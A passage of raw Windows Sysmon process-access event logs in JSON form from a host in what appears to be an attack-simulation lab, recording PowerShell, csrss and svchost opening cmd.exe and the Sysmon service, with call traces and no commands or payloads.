l+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663a12fd(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-001085460800}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663735cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e24fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663a12fd(wow64)","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5244,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-001085460800}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-001085460800}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5245,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5246,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5247,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5248,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5249,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5250,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
